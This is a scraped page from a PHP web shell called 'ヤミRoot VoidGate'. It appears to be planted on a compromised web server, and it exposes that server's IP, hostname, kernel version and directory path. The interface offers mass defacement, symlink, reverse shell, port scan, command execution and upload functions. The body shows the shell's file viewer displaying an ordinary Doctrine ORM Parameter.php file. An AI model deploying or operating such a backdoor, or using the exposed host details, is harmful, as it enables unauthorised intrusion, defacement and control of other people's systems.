ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
doctrine
/
orm
/
lib
/
Doctrine
/
ORM
/
Query
/
Viewing: Parameter.php
<?php declare(strict_types=1); namespace Doctrine\ORM\Query; use function trim; /** * Defines a Query Parameter. * * @link www.doctrine-project.org */ class Parameter { /** * Returns the internal representation of a parameter name. * * @param string|int $name The parameter name or position. * * @return string The normalized parameter name. */ public static function normalizeName($name) { return trim((string) $name, ':'); } /** * The parameter name. * * @var string */ private $name; /** * The parameter value. * * @var mixed */ private $value; /** * The parameter type. * * @var mixed */ private $type; /** * Whether the parameter type was explicitly specified or not * * @var bool */ private $typeSpecified; /** * @param string|int $name Parameter name * @param mixed $value Parameter value * @param mixed $type Parameter type */ public function __construct($name, $value, $type = null) { $this->name = self::normalizeName($name); $this->typeSpecified = $type !== null; $this->setValue($value, $type); } /** * Retrieves the Parameter name. * * @return string */ public function getName() { return $this->name; } /** * Retrieves the Parameter value. * * @return mixed */ public function getValue() { return $this->value; } /** * Retrieves the Parameter type. * * @return mixed */ public function getType() { return $this->type; } /** * Defines the Parameter value. * * @param mixed $value Parameter value. * @param mixed $type Parameter type. * * @return void */ public function setValue($value, $type = null) { $this->value = $value; $this->type = $type ?: ParameterTypeInferer::inferType($value); } public function typeWasSpecified(): bool { return $this->typeSpecified; } }
Coded With 💗 by
0x6ick